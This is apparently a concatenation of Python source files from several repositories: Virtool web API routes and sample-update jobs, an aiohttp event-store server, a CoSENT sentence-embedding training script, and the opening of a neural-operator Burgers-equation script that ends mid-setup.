import virtool.indexes.db
import virtool.jobs.db
import virtool.references.db
import virtool.db.utils
import virtool.history.utils
import virtool.http.routes
import virtool.jobs.build_index
import virtool.utils
from virtool.api import bad_request, compose_regex_query, conflict, insufficient_rights, json_response, \
not_found, paginate
routes = virtool.http.routes.Routes()
@routes.get("/api/indexes")
async def find(req):
"""
Return a list of indexes.
"""
db = req.app["db"]
ready = req.query.get("ready", False)
if not ready:
data = await virtool.indexes.db.find(db, req.query)
return json_response(data)
pipeline = [
{
"$match": {
"ready": True
}
},
{
"$sort": {
"version": -1
}
},
{
"$group": {
"_id": "$reference.id",
"index": {
"$first": "$_id"
},
"version": {
"$first": "$version"
}
}
}
]
ready_indexes = list()
async for agg in db.indexes.aggregate(pipeline):
reference_name = await virtool.db.utils.get_one_field(db.references, "name", agg["_id"])
ready_indexes.append({
"id": agg["index"],
"version": agg["version"],
"reference": {
"id": agg["_id"],
"name": reference_name
}
})
return json_response(ready_indexes)
@routes.get("/api/indexes/{index_id}")
async def get(req):
"""
Get the complete document for a given index.
"""
db = req.app["db"]
index_id = req.match_info["index_id"]
document = await db.indexes.find_one(index_id)
if not document:
return not_found()
document = virtool.utils.base_processor(document)
document["contributors"] = await virtool.indexes.db.get_contributors(db, index_id)
document["otus"] = await virtool.indexes.db.get_otus(db, index_id)
document["change_count"] = sum(v["change_count"] for v in document["otus"])
return json_response(document)
@routes.post("/api/refs/{ref_id}/indexes")
async def create(req):
"""
Starts a job to rebuild the otus Bowtie2 index on disk. Does a check to make sure there are no unverified
otus in the collection and updates otu history to show the version and id of the new index.
"""
db = req.app["db"]
ref_id = req.match_info["ref_id"]
reference = await db.references.find_one(ref_id, ["groups", "users"])
if reference is None:
return not_found()
if not await virtool.references.db.check_right(req, reference, "build"):
return insufficient_rights()
if await db.indexes.count({"reference.id": ref_id, "ready": False}):
return conflict("Index build already in progress")
if await db.otus.count({"reference.id": ref_id, "verified": False}):
return bad_request("There are unverified OTUs")
if not await db.history.count({"reference.id": ref_id, "index.id": "unbuilt"}):
return bad_request("There are no unbuilt changes")
index_id = await virtool.db.utils.get_new_id(db.indexes)
index_version = await virtool.indexes.db.get_next_version(db, ref_id)
job_id = await virtool.db.utils.get_new_id(db.jobs)
manifest = await virtool.references.db.get_manifest(db, ref_id)
user_id = req["client"].user_id
document = {
"_id": index_id,
"version": index_version,
"created_at": virtool.utils.timestamp(),
"manifest": manifest,
"ready": False,
"has_files": True,
"job": {
"id": job_id
},
"reference": {
"id": ref_id
},
"user": {
"id": user_id
}
}
await db.indexes.insert_one(document)
await db.history.update_many({"index.id": "unbuilt", "reference.id": ref_id}, {
"$set": {
"index": {
"id": index_id,
"version": index_version
}
}
})
# A dict of task_args for the rebuild job.
task_args = {
"ref_id": ref_id,
"user_id": user_id,
"index_id": index_id,
"index_version": index_version,
"manifest": manifest
}
# Create job document.
job = await virtool.jobs.db.create(
db,
req.app["settings"],
"build_index",
task_args,
user_id,
job_id=job_id
)
await req.app["jobs"].enqueue(job["_id"])
headers = {
"Location": "/api/indexes/" + index_id
}
return json_response(virtool.utils.base_processor(document), status=201, headers=headers)
@routes.get("/api/indexes/{index_id}/history")
async def find_history(req):
"""
Find history changes for a specific index.
"""
db = req.app["db"]
index_id = req.match_info["index_id"]
if not await db.indexes.count({"_id": index_id}):
return not_found()
term = req.query.get("term", None)
db_query = {
"index.id": index_id
}
if term:
db_query.update(compose_regex_query(term, ["otu.name", "user.id"]))
data = await paginate(
db.history,
db_query,
req.query,
sort=[("otu.name", 1), ("otu.version", -1)],
projection=virtool.history.db.LIST_PROJECTION,
reverse=True
)
return json_response(data)
```
#### File: virtool/jobs/run.py
```python
def run(job_id, db_connection_string, db_name, redis=None):
pass
```
#### File: virtool/jobs/update_sample.py
```python
import os
import virtool.caches.db
import virtool.files.db
import virtool.samples.db
import virtool.jobs.fastqc
import virtool.jobs.job
import virtool.jobs.utils
import virtool.samples.utils
import virtool.utils
class Job(virtool.jobs.job.Job):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
#: The ordered list of :ref:`stage methods <stage-methods>` that are called by the job.
self._stage_list = [
self.copy_files,
self.fastqc,
self.parse_fastqc,
self.create_cache,
self.replace_old
]
def check_db(self):
self.params = virtool.jobs.utils.get_sample_params(
self.db,
self.settings,
self.task_args
)
def copy_files(self):
"""
Copy the replacement files from the files directory to the sample directory.
The files are named replacement_reads_<suffix>.fq.gz. They will be compressed if necessary.
"""
files = self.params["files"]
sample_id = self.params["sample_id"]
paths = [os.path.join(self.settings["data_path"], "files", file["replacement"]["id"]) for file in files]
sizes = virtool.jobs.utils.copy_files_to_sample(
paths,
self.params["sample_path"],
self.proc
)
raw = list()
for index, file in enumerate(files):
name = f"reads_{index + 1}.fq.gz"
raw.append({
"name": name,
"download_url": f"/download/samples/{sample_id}/{name}",
"size": sizes[index],
"from": file
})
self.intermediate["raw"] = raw
def fastqc(self):
"""
Runs FastQC on the replacement read files.
"""
fastq_path = self.params["fastqc_path"]
try:
virtool.utils.rm(fastq_path, recursive=True)
except FileNotFoundError:
pass
os.mkdir(fastq_path)
paths = virtool.samples.utils.join_read_paths(
self.params["sample_path"],
self.params["paired"]
)
virtool.jobs.fastqc.run_fastqc(
self.run_subprocess,
self.proc,
paths,
fastq_path
)
def parse_fastqc(self):
"""
Capture the desired data from the FastQC output. The data is added to the samples database
in the main run() method
"""
self.intermediate["qc"] = virtool.jobs.fastqc.parse_fastqc(
self.params["fastqc_path"],
self.params["sample_path"],
prefix="replacement_fastqc_"
)
def create_cache(self):
"""
Create a cache from the old sample files.
These files constitute a valid cache because they were trimmed in the original CreateSample job.
"""
sample_id = self.params["sample_id"]
self.intermediate["cache_id"] = virtool.caches.db.create(
self.db,
sample_id,
virtool.samples.utils.LEGACY_TRIM_PARAMETERS,
self.params["paired"],
legacy=True
)
cache_id = self.intermediate["cache_id"]
self.dispatch("caches", "insert", [cache_id])
files = list()
cache_path = virtool.jobs.utils.join_cache_path(self.settings, cache_id)
os.makedirs(cache_path)
for index, file in enumerate(self.params["files"]):
path = os.path.join(self.params["sample_path"], file["name"])
name = f"reads_{index + 1}.fq.gz"
target = os.path.join(cache_path, name)
virtool.jobs.utils.copy_or_compress(path, target, self.proc)
stats = virtool.utils.file_stats(target)
files.append({
"name": name,
"size": stats["size"]
})
self.db.caches.update_one({"_id": cache_id}, {
"$set": {
"ready": True,
"files": files,
"quality": self.params["document"]["quality"]
}
})
self.dispatch("caches", "update", [cache_id])
analysis_query = {"sample.id": sample_id}
self.db.analyses.update_many(analysis_query, {
"$set": {
"cache": {
"id": cache_id
}
}
})
analysis_ids = self.db.analyses.distinct("_id", analysis_query)
self.dispatch("analyses", "update", analysis_ids)
def replace_old(self):
sample_id = self.params["sample_id"]
files = list()
# Prepare new list for `files` field in sample document.
for index, file in enumerate(self.params["files"]):
name = f"reads_{index + 1}.fq.gz"
path = os.path.join(self.params["sample_path"], name)
stats = virtool.utils.file_stats(path)
files.append({
"name": name,
"download_url": f"/download/samples/{sample_id}/{name}",
"size": stats["size"],
"from": file["replacement"],
"raw": True
})
# Set new files as primary files for sample. Add prune flag, which will cause old files to be automatically
# removed when they are no longer in use by running analyses.
self.db.samples.update_one({"_id": self.params["sample_id"]}, {
"$set": {
"files": files,
"prune": True,
"quality": self.intermediate["qc"]
},
"$unset": {
"update_job": ""
}
})
self.dispatch("samples", "update", [self.params["sample_id"]])
def cleanup(self):
# Remove cache
cache_id = self.intermediate.get("cache_id")
if cache_id:
            self.db.caches.delete_one({"_id": cache_id})
cache_path = virtool.jobs.utils.join_cache_path(self.settings, cache_id)
self.dispatch("caches", "delete", [cache_id])
# Remove cache directory.
try:
virtool.utils.rm(cache_path, recursive=True)
except FileNotFoundError:
pass
sample_id = self.params["sample_id"]
# Undo analysis cache field addition.
analysis_query = {"sample.id": sample_id}
self.db.analyses.update_many(analysis_query, {
"$unset": {
"cache": ""
}
})
analysis_ids = self.db.analyses.distinct("_id", analysis_query)
self.dispatch("analyses", "update", analysis_ids)
# Undo sample document changes.
self.db.samples.update_one({"_id": sample_id}, {
"$set": {
# Use old files and quality fields.
"files": self.params["files"],
"quality": self.params["document"]["quality"]
},
"$unset": {
"prune": "",
"update_job": ""
}
})
self.dispatch("samples", "update", [sample_id])
# Remove sample files.
paths = virtool.samples.utils.join_read_paths(self.params["sample_path"], paired=True)
for path in paths:
try:
virtool.utils.rm(path)
except FileNotFoundError:
pass
```
#### File: virtool/processes/api.py
```python
import virtool.http.routes
import virtool.utils
from virtool.api import json_response, not_found
routes = virtool.http.routes.Routes()
@routes.get("/api/processes")
async def find(req):
db = req.app["db"]
documents = [virtool.utils.base_processor(d) async for d in db.processes.find()]
return json_response(documents)
@routes.get("/api/processes/{process_id}")
async def get(req):
db = req.app["db"]
process_id = req.match_info["process_id"]
document = await db.processes.find_one(process_id)
if not document:
return not_found()
return json_response(virtool.utils.base_processor(document))
```
#### File: virtool/settings/db.py
```python
import logging
logger = logging.getLogger(__name__)
PROJECTION = {
"_id": False
}
CONFIG_PROJECTION = (
"data_path",
"watch_path",
"proc",
"mem",
"lg_proc",
"lg_mem",
"sm_proc",
"sm_mem"
)
async def get(db):
settings = await db.settings.find_one("settings", projection=PROJECTION)
if settings:
return settings
return dict()
async def update(db, updates):
return await db.settings.find_one_and_update({"_id": "settings"}, {
"$set": updates
})
```
#### File: virtool/subtractions/api.py
```python
import shutil
import virtool.jobs.db
import virtool.subtractions.db
import virtool.db.utils
import virtool.http.routes
import virtool.samples.utils
import virtool.subtractions.utils
import virtool.utils
import virtool.validators
from virtool.api import bad_request, compose_regex_query, conflict, json_response, no_content, not_found, paginate
routes = virtool.http.routes.Routes()
@routes.get("/api/subtractions")
async def find(req):
db = req.app["db"]
ids = req.query.get("ids", False)
if ids:
return json_response(await db.subtraction.distinct("_id"))
host_count = await db.subtraction.count({"is_host": True})
ready_host_count = await db.subtraction.count({"is_host": True, "ready": True})
term = req.query.get("find", None)
db_query = dict()
if term:
db_query.update(compose_regex_query(term, ["_id"]))
data = await paginate(
db.subtraction,
db_query,
req.query,
sort="_id",
projection=virtool.subtractions.db.PROJECTION
)
data.update({
"host_count": host_count,
"ready_host_count": ready_host_count
})
return json_response(data)
@routes.get("/api/subtractions/{subtraction_id}")
async def get(req):
"""
Get a complete host document.
"""
db = req.app["db"]
subtraction_id = req.match_info["subtraction_id"]
document = await db.subtraction.find_one(subtraction_id)
if not document:
return not_found()
document["linked_samples"] = await virtool.subtractions.db.get_linked_samples(db, subtraction_id)
return json_response(virtool.utils.base_processor(document))
@routes.post("/api/subtractions", permission="modify_subtraction", schema={
"subtraction_id": {
"type": "string",
"coerce": virtool.validators.strip,
"empty": False,
"required": True
},
"nickname": {
"type": "string",
"coerce": virtool.validators.strip,
"default": ""
},
"file_id": {
"type": "string",
"required": True
}
})
async def create(req):
"""
Add a new subtraction. Starts an :class:`.CreateSubtraction` job process.
"""
db = req.app["db"]
data = req["data"]
subtraction_id = data["subtraction_id"]
if await db.subtraction.count({"_id": subtraction_id}):
return bad_request("Subtraction name already exists")
file_id = data["file_id"]
file = await db.files.find_one(file_id, ["name"])
if file is None:
return bad_request("File does not exist")
job_id = await virtool.db.utils.get_new_id(db.jobs)
user_id = req["client"].user_id
document = {
"_id": data["subtraction_id"],
"nickname": data["nickname"],
"ready": False,
"is_host": True,
"file": {
"id": file_id,
"name": file["name"]
},
"user": {
"id": user_id
},
"job": {
"id": job_id
}
}
await db.subtraction.insert_one(document)
task_args = {
"subtraction_id": subtraction_id,
"file_id": file_id
}
await virtool.jobs.db.create(
db,
req.app["settings"],
"create_subtraction",
task_args,
user_id,
job_id=job_id
)
await req.app["jobs"].enqueue(job_id)
headers = {
"Location": f"/api/account/keys/{subtraction_id}"
}
return json_response(virtool.utils.base_processor(document), headers=headers, status=201)
@routes.patch("/api/subtractions/{subtraction_id}", permission="modify_subtraction", schema={
"nickname": {
"type": "string",
"coerce": virtool.validators.strip,
"required": True
}
})
async def edit(req):
"""
Updates the nickname for an existing subtraction.
"""
db = req.app["db"]
data = req["data"]
subtraction_id = req.match_info["subtraction_id"]
document = await db.subtraction.find_one_and_update({"_id": subtraction_id}, {
"$set": {
"nickname": data["nickname"]
}
})
if document is None:
return not_found()
document["linked_samples"] = await virtool.subtractions.db.get_linked_samples(db, subtraction_id)
return json_response(virtool.utils.base_processor(document))
@routes.delete("/api/subtractions/{subtraction_id}", permission="modify_subtraction")
async def remove(req):
db = req.app["db"]
settings = req.app["settings"]
subtraction_id = req.match_info["subtraction_id"]
if await db.samples.count({"subtraction.id": subtraction_id}):
return conflict("Has linked samples")
delete_result = await db.subtraction.delete_one({"_id": subtraction_id})
if delete_result.deleted_count == 0:
return not_found()
index_path = virtool.subtractions.utils.calculate_index_path(settings, subtraction_id)
await req.app["run_in_thread"](shutil.rmtree, index_path, True)
return no_content()
``` |
{
"source": "Jin-Xu/estore-server",
"score": 2
} |
#### File: estore/server/builtins.py
```python
import sys
async def length(obj):
return await getattr(obj, '__length__')()
def register():
sys.modules['builtins'].length = length
```
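The `register()` call above patches an async `length` helper into the `builtins` module so it can be used without an explicit import. A minimal sketch of how that plays out, assuming the package layout matches the file path and the target object exposes an async `__length__`:
```python
import asyncio

from estore.server import builtins  # assumed import path for the module above

builtins.register()

class Stream:
    async def __length__(self):
        return 42

# `length` resolves through the patched builtins module, so no import is needed
# (static linters will still flag it as undefined).
print(asyncio.run(length(Stream())))  # -> 42
```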
#### File: estore/server/view.py
```python
import json
import uuid
import logging
import functools
import asyncio
import aiohttp.web
import aiohttp_session
import estore.base  # needed for estore.base.Event used in get_event_from_request
import estore.server.store
logger = logging.getLogger(__name__)
def process_headers(headers):
return dict(map(
lambda x: (x[0][5:], x[1]),
filter(lambda x: x[0].startswith('X-ES-'), headers.items())))
def init(app, store):
event = Event(store)
app.add_post('/{stream}/{name}', event.add)
app.add_get('/ws', event.websocket)
app.add_get('/ws/{start}', event.websocket, name='with_start')
app.add_get('/stream/{stream_id}', event.stream)
async def get_event_from_request(request):
print(request.headers)
headers = process_headers(request.headers)
name = request.match_info['name']
stream = request.match_info['stream']
version = headers['Version']
del headers['Version']
body = await request.post()
return estore.base.Event(name, uuid.UUID(stream), version, dict(body), headers)
def get_stream_id_from_request(request):
return uuid.UUID(request.match_info['stream_id'])
class Event(object):
def __init__(self, store):
self.__store = store
async def add(self, request):
await self.__store.append(await get_event_from_request(request))
return aiohttp.web.Response(text='Added')
async def __consume(self, ws, start=None):
collection = self.__store
if start:
collection = collection[start:]
async for event in collection:
try:
await ws.send_json(event.dict())
except Exception:
raise asyncio.CancelledError()
async def websocket(self, req):
ws = aiohttp.web.WebSocketResponse()
await ws.prepare(req)
task = asyncio.ensure_future(self.__consume(ws, req.match_info.get('start', None)))
try:
async for msg in ws:
pass
except Exception as e:
pass
await ws.close()
task.cancel()
logger.info("Closing websocket session for %s", task)
return ws
async def stream(self, request):
output = []
async for event in self.__store[get_stream_id_from_request(request)]:
output.append(dict(event))
return aiohttp.web.json_response(output)
```
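The `add` handler above reads the event version from an `X-ES-` prefixed header (stripped by `process_headers`) and the payload from form data. A hypothetical client call against the `/{stream}/{name}` route registered in `init()`; the host, port, and mount point are assumptions:
```python
import asyncio
import uuid

import aiohttp

async def send_event():
    async with aiohttp.ClientSession() as session:
        resp = await session.post(
            f"http://localhost:8080/{uuid.uuid4()}/user_created",  # /{stream}/{name}
            data={"email": "user@example.com"},                    # becomes the event body
            headers={"X-ES-Version": "1"},                         # arrives as headers['Version']
        )
        print(await resp.text())  # "Added"

asyncio.run(send_event())
```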
#### File: estore/server/web.py
```python
import functools
import aiohttp.web
class Application(aiohttp.web.Application):
def __init__(self, name, *args, **kwargs):
super(Application, self).__init__(*args, **kwargs)
self.__name = name
        self.__children = {}
def get_name(self):
return self.__name
def add_get(self, path, callback, **options):
if not 'name' in options:
options['name'] = callback.__name__
self.add_routes([aiohttp.web.get(path, callback, **options)])
def add_post(self, path, callback, **options):
if not 'name' in options:
options['name'] = callback.__name__
self.add_routes([aiohttp.web.post(path, callback, **options)])
def add_view(self, path, callback, **options):
if not 'name' in options:
options['name'] = callback.__name__
self.add_routes([aiohttp.web.view(path, callback, **options)])
def add_subapp(self, path, app):
super(Application, self).add_subapp(path, app)
name = app.get_name()
if name:
self.__children[name] = app
def url_for(self, name, *args, **kwargs):
if '.' in name:
child_name, rest = name.split('.', 1)
return self.__children[child_name].url_for(rest, *args, **kwargs)
return str(self.router[name].url_for(*args, **kwargs))
class Response:
def __init__(self, env):
self.__env = env
def redirect(self):
pass
async def render_template(self, name, **kwargs):
template = self.__env.get_template(name)
return aiohttp.web.Response(
text=await template.render_async(**kwargs), content_type='text/html')
def unpack_match_info(f):
@functools.wraps(f)
def wrapper(obj, request):
return f(obj, request, **request.match_info)
return wrapper
``` |
{
"source": "jinxulin/chinese-text2vec",
"score": 2
} |
#### File: chinese-text2vec/src/train.py
```python
import argparse
import os
import time
import pandas as pd
import torch
from torch.cuda import amp  # used for mixed-precision training below
from datetime import datetime
from data import SentencePairDataset
from model import *
from runner import *
from tqdm import tqdm
from torch.utils.data import DataLoader
from transformers import BertConfig, BertModel, BertTokenizer
def set_args():
parser = argparse.ArgumentParser('--使用transformers实现cosent')
parser.add_argument('--train_data_path', default='../data/train.csv', type=str, help='训练数据集')
parser.add_argument('--dev_data_path', default='../data/dev_test.csv', type=str, help='测试数据集')
parser.add_argument('--pretrain_dir', default='../pretrain/', type=str, help='预训练模型模型位置')
parser.add_argument('--train_batch_size', default=16, type=int, help='训练批次的大小')
parser.add_argument('--dev_batch_size', default=16, type=int, help='验证批次的大小')
parser.add_argument('--output_dir', default='../output/', type=str, help='模型输出目录')
parser.add_argument('--num_epochs', default=10, type=int, help='训练几轮')
parser.add_argument('--learning_rate', default=2e-5, type=float, help='学习率大小')
parser.add_argument('--model', default='cosent', type=str, help='模型名称,可以是cosent或sbert')
return parser.parse_args()
def run(args):
# 预训练模型加载
device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')
tokenizer = BertTokenizer.from_pretrained(os.path.join(args.pretrain_dir, 'vocabs.txt'), local_files_only=True, do_lower_case=True)
pretrain_config = BertConfig.from_pretrained(os.path.join(args.pretrain_dir, 'config.json'))
pretrain_model = BertModel.from_pretrained(args.pretrain_dir, config=pretrain_config)
# 模型初始化
model = Model(pretrain_model)
model.to(device)
# 数据加载
df_train = pd.read_csv(args.train_data_path, sep='\t')
df_dev = pd.read_csv(args.dev_data_path, sep='\t')
train_data = SentencePairDataset(tokenizer, df_train)
train_loader = DataLoader(train_data, shuffle=True, batch_size=args.train_batch_size)
dev_data = SentencePairDataset(tokenizer, df_dev)
dev_loader = DataLoader(dev_data, shuffle=False, batch_size=args.dev_batch_size)
# 优化器设置
param_optimizer = list(model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [{
'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)],
'weight_decay':0.01
},{
'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)],
'weight_decay':0.0
}]
optimizer = torch.optim.AdamW(optimizer_grouped_parameters, lr=args.learning_rate)
scaler = amp.GradScaler()
for epoch in range(args.num_epochs):
start_time = time.time()
running_loss = 0
batch_time_avg = 0
tqdm_batch_iterator = tqdm(train_loader)
for batch_index, batch in enumerate(tqdm_batch_iterator):
model.zero_grad()
if torch.cuda.is_available():
batch = tuple(t.cuda() for t in batch)
s1_input_ids, s2_input_ids, label = batch
with amp.autocast():
s1_vec, s2_vec = model(s1_input_ids, s2_input_ids)
loss = cosent_loss(s1_vec, s2_vec, label)
scaler.scale(loss).backward()
scaler.step(optimizer)
scaler.update()
else:
s1_input_ids, s2_input_ids, label = batch
s1_vec, s2_vec = model(s1_input_ids, s2_input_ids)
loss = cosent_loss(s1_vec, s2_vec, label)
loss.backward()
optimizer.step()
running_loss += loss.item()
batch_time_avg = time.time() - start_time
description = "Running metrics on average. time: {:.4f}s, loss: {:.4f}".format(batch_time_avg / (batch_index + 1), running_loss / (batch_index + 1))
tqdm_batch_iterator.set_description(description)
print("* Validation for epoch {}:".format(epoch))
epoch_time, epoch_loss, epoch_accuracy, epoch_auc, epoch_pearsonr = validate(model, dev_loader)
result_info = "Valid metrics. time: {:.4f}s, loss: {:.4f}, accuracy: {:.4f}%, auc: {:.4f}, pearsonr: {:.4f}\n".format(epoch_time, epoch_loss, (epoch_accuracy * 100), epoch_auc, epoch_pearsonr)
print(result_info)
torch.save({"epoch": epoch,
"model": model.state_dict(),
"valid_losses": epoch_loss},
os.path.join(args.output_dir, "model_{0}.pth.tar".format(epoch)))
with open("{0}/history.txt".format(args.output_dir), "a") as history:
history.write(datetime.now().strftime('%Y-%m-%d %H:%M:%S') + f" epoch {epoch}: " + result_info)
if __name__ == "__main__":
# 参数设置
args = set_args()
run(args)
``` |
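The loop above calls `cosent_loss`, which is imported via `from model import *` and not included in this excerpt. For reference, a minimal sketch of the standard CoSENT ranking loss (scale factor 20, labels of 1 for similar and 0 for dissimilar pairs) is given below; this is an assumption about what the repository's implementation looks like, not a copy of it:
```python
import torch
import torch.nn.functional as F

def cosent_loss_sketch(s1_vec, s2_vec, labels, scale=20.0):
    # Scaled cosine similarity for each sentence pair in the batch.
    cos = F.cosine_similarity(s1_vec, s2_vec, dim=-1) * scale
    # diff[i, j] = cos[j] - cos[i]; penalize pairs where label_i > label_j but cos_i <= cos_j.
    diff = cos[None, :] - cos[:, None]
    mask = labels[:, None] > labels[None, :]
    diff = diff[mask]
    # log(1 + sum(exp(diff))): prepend a zero so an empty mask yields a loss of 0.
    zero = torch.zeros(1, device=diff.device, dtype=diff.dtype)
    return torch.logsumexp(torch.cat([zero, diff]), dim=0)
```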
{
"source": "jinxy17/library-management",
"score": 3
} |
#### File: library-management/Managers/models.py
```python
from django.db import models
from Users.models import AppComment
class Manager(models.Model):
''' Models for Manager '''
account = models.CharField(unique=True, max_length=20)
password = models.CharField(max_length=20)
def __str__(self):
return self.account
class ManagerResponse(models.Model):
''' Models for Manager Response to appcomments'''
manager = models.ForeignKey(Manager, related_name="responses", on_delete=models.CASCADE)
comment = models.CharField(max_length=1000)
timestamp = models.DateTimeField(auto_now_add=True)
response = models.OneToOneField(AppComment, on_delete=models.CASCADE)
``` |
{
"source": "JinY0ung-Shin/PDNO",
"score": 2
} |
#### File: JinY0ung-Shin/PDNO/Burgers_1d.py
```python
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
import matplotlib.pyplot as plt
from utils import MatReader, rel_error, UnitGaussianNormalizer
from tqdm import tqdm
import sys
import argparse
import os
import shutil
torch.manual_seed(0)
np.random.seed(0)
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
class Net(nn.Module):
def __init__(self, d_in, d_out, activation='gelu', num_layer=1, d_hidden=64):
super().__init__()
self.linear_in = nn.Linear(d_in, d_hidden)
self.hidden = nn.ModuleList([nn.Linear(d_hidden, d_hidden) for i in range(num_layer)])
self.linear_out = nn.Linear(d_hidden, d_out)
act = activation.lower()
if act=='tanh':
self.activation=torch.tanh
if act=='gelu':
self.activation = F.gelu
def forward(self, x):
out = self.linear_in(x)
out = self.activation(out)
for layer in self.hidden:
out = layer(out)
out = self.activation(out)
return self.linear_out(out)
class SpectralConv1d_fast(nn.Module):
def __init__(self, in_channels, out_channels, activation, num_layer, d_hidden, net_out, k_max=None):
super(SpectralConv1d_fast, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.net_out = net_out
self.k_max = k_max
self.scale = (1 / (in_channels * out_channels))
self.net_real = Net(d_in=1, d_out=in_channels*out_channels, activation=activation, num_layer=num_layer, d_hidden=d_hidden)
self.net_imag= Net(d_in=1, d_out=in_channels*out_channels, activation=activation, num_layer=num_layer, d_hidden=d_hidden)
if self.net_out:
self.net_out = Net(d_in=1, d_out=in_channels*out_channels, activation=activation,
num_layer=num_layer, d_hidden=d_hidden)
def _weights(self, shape):
grid = self.get_grid_freq(shape)
out_real = self.net_real(grid).permute(1, 0).contiguous()
out_imag = self.net_imag(grid).permute(1, 0).contiguous()
out_real = out_real.reshape(self.out_channels, self.in_channels, *(grid.shape[:1]))
out_imag = out_imag.reshape(self.out_channels, self.in_channels, *(grid.shape[:1]))
_out = torch.complex(out_real, out_imag)
if self.k_max:
out = _out.new_zeros(self.out_channels, self.in_channels, shape[0]//2+1)
out[:,:,:self.k_max] = _out
return out
else:
return _out
def _weights_out(self, shape):
grid = self.get_grid(shape)
out = self.net_out(grid).permute(1, 0).contiguous()
out = out.reshape(self.out_channels, self.in_channels, shape[0])
return out
def cal_weights(self, shape):
self.set_shape(shape)
self.weights = self._weights(shape)
if self.net_out:
self.weights_out = self._weights_out(shape)
def set_shape(self, shape):
self.shape = shape
def forward(self, x):
batchsize = x.shape[0]
shape = x.shape[-1:]
self.cal_weights(shape)
x_ft = torch.fft.rfft(x)
out_ft = x_ft.unsqueeze(dim=1)*self.weights
if self.net_out:
x = torch.fft.irfft(out_ft, n=(x.size(-1)))
x = x*self.weights_out
x = x.sum(dim=2)
else:
out_ft = out_ft.sum(dim=2)
x = torch.fft.irfft(out_ft, n=(x.size(-1)))
return x
def get_grid(self, shape):
mx = shape[0]
mx = torch.linspace(0, 1, mx)
mx = mx.to(device)
return mx.unsqueeze(dim=-1)
def get_grid_freq(self, shape):
mx = shape[0]
mx = torch.fft.rfftfreq(mx, d=1)
if self.k_max:
mx = mx[:self.k_max]
mx = mx.to(device)
return mx.unsqueeze(dim=-1)
class Burgers(nn.Module):
def __init__(self, width, symbol_act, num_layer=2, num_hidden=32, net_out=True, k_max=None):
super(Burgers, self).__init__()
self.width = width
self.fc0 = nn.Linear(2, self.width)
self.conv0 = SpectralConv1d_fast(self.width, self.width, num_layer=num_layer, d_hidden=num_hidden, activation= symbol_act, net_out=net_out, k_max=k_max)
self.conv1 = SpectralConv1d_fast(self.width, self.width, num_layer=num_layer, d_hidden=num_hidden, activation= symbol_act, net_out=net_out, k_max=k_max)
self.conv2 = SpectralConv1d_fast(self.width, self.width, num_layer=num_layer, d_hidden=num_hidden, activation= symbol_act, net_out=net_out, k_max=k_max)
self.conv3 = SpectralConv1d_fast(self.width, self.width, num_layer=num_layer, d_hidden=num_hidden, activation= symbol_act, net_out=net_out, k_max=k_max)
self.w0 = nn.Conv1d(self.width, self.width, 1)
self.w1 = nn.Conv1d(self.width, self.width, 1)
self.w2 = nn.Conv1d(self.width, self.width, 1)
self.w3 = nn.Conv1d(self.width, self.width, 1)
self.fc1 = nn.Linear(self.width, 128)
self.fc2 = nn.Linear(128, 1)
def forward(self, x):
grid = self.get_grid(x.shape, x.device)
x = torch.cat((x, grid), dim=-1)
x = self.fc0(x)
x = x.permute(0, 2, 1).contiguous()
x1 = self.conv0(x)
x2 = self.w0(x)
x = x1 + x2
x = F.gelu(x)
x1 = self.conv1(x)
x2 = self.w1(x)
x = x1 + x2
x = F.gelu(x)
x1 = self.conv2(x)
x2 = self.w2(x)
x = x1 + x2
x = F.gelu(x)
x1 = self.conv3(x)
x2 = self.w3(x)
x = x1 + x2
x = x.permute(0, 2, 1).contiguous()
x = self.fc1(x)
x = F.gelu(x)
x = self.fc2(x)
return x
def get_grid(self, shape, device):
batchsize, size_x = shape[0], shape[1]
gridx = torch.tensor(np.linspace(0, 1, size_x), dtype=torch.float)
gridx = gridx.reshape(1, size_x, 1).repeat([batchsize, 1, 1])
return gridx.to(device)
def get_args(argv=None):
parser = argparse.ArgumentParser(description = 'Put your hyperparameters')
parser.add_argument('name', type=str, help='experiments name')
parser.add_argument('--batch', default=20, type=int, help = 'batch size')
parser.add_argument('--epochs', default=1000, type=int, help = 'Number of Epochs')
parser.add_argument('--lr', default=5e-3, type=float, help='learning rate')
parser.add_argument('--wd', default=0, type=float, help='weight decay')
parser.add_argument('--step_size', default=100, type=int, help='scheduler step size')
parser.add_argument('--gamma', default=0.5, type=float, help='scheduler factor')
parser.add_argument('--multgpu', action='store_true', help='whether multiple gpu or not')
parser.add_argument('--width', default=64, type=int, help='number of channel')
parser.add_argument('--num_layer', default=2, type=int, help='number of hidden layer of implicit network')
parser.add_argument('--num_hidden', default=64, type=int, help='dimension of hidden layer of implicit network')
parser.add_argument('--sub', default=32, type=int, help='sub sampling rate')
parser.add_argument('--act', default='tanh', type=str, help='activation')
parser.add_argument('--load_path', default=None, type=str, help='path of directory to resume the training')
parser.add_argument('--net_out', action='store_false', help='use symbol network with a(x) or not')
parser.add_argument('--k_max', default=None, type=int, help='maximum mode')
return parser.parse_args(argv)
if __name__=="__main__":
args = get_args()
print(args)
NAME = args.name
if args.load_path is None:
PATH = 'results/{}/'.format(sys.argv[0][:-3])
if not os.path.exists(PATH):
os.mkdir(PATH)
PATH = os.path.join(PATH, NAME)
os.mkdir(PATH)
else:
epoch_add = args.epochs
PATH = args.load_path
args = torch.load(os.path.join(args.load_path, 'args.bin'))
args.load_path = PATH
args.name = NAME
PATH = os.path.join(PATH, NAME)
os.mkdir(PATH)
args.epochs+=epoch_add
shutil.copy(sys.argv[0], os.path.join(PATH, 'code.py'))
if args.multgpu:
num_gpu = torch.cuda.device_count()
else:
num_gpu = 1
lr = args.lr
wd = args.wd
batch_size = args.batch
EPOCHS = args.epochs
step_size = args.step_size
gamma = args.gamma
width = args.width
num_layer = args.num_layer
num_hidden = args.num_hidden
    sub = args.sub  # sub sampling rate
symbol_act = args.act
net_out = args.net_out
k_max = args.k_max
torch.save(args, os.path.join(PATH, 'args.bin'))
ntrain = 1000
ntest = 100
TRAIN_PATH = 'data/burgers_data_R10.bin'
TEST_PATH = 'data/burgers_data_R10.bin'
h = 2**13 // sub # total grid size divided by the subsampling rate
s = h
